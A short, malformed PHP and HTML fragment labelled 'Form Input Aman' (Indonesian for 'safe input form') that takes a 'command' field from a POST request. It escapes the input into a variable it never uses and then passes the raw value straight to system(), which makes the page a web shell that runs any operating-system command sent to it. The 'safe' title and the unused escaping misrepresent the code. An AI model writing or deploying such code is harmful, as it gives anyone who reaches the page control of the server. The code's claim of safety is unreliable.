if ($_SERVER['REQUEST_METHOD'] === 'POST') { $input = htmlspecialchars($_POST['command'] ?? ''); system($_POST['command']); } <!DOCTYPE html> <html lang="id"> <meta charset="UTF-8">Form Input Aman <title>Form Input Aman</title>
<label for="command">command: </label>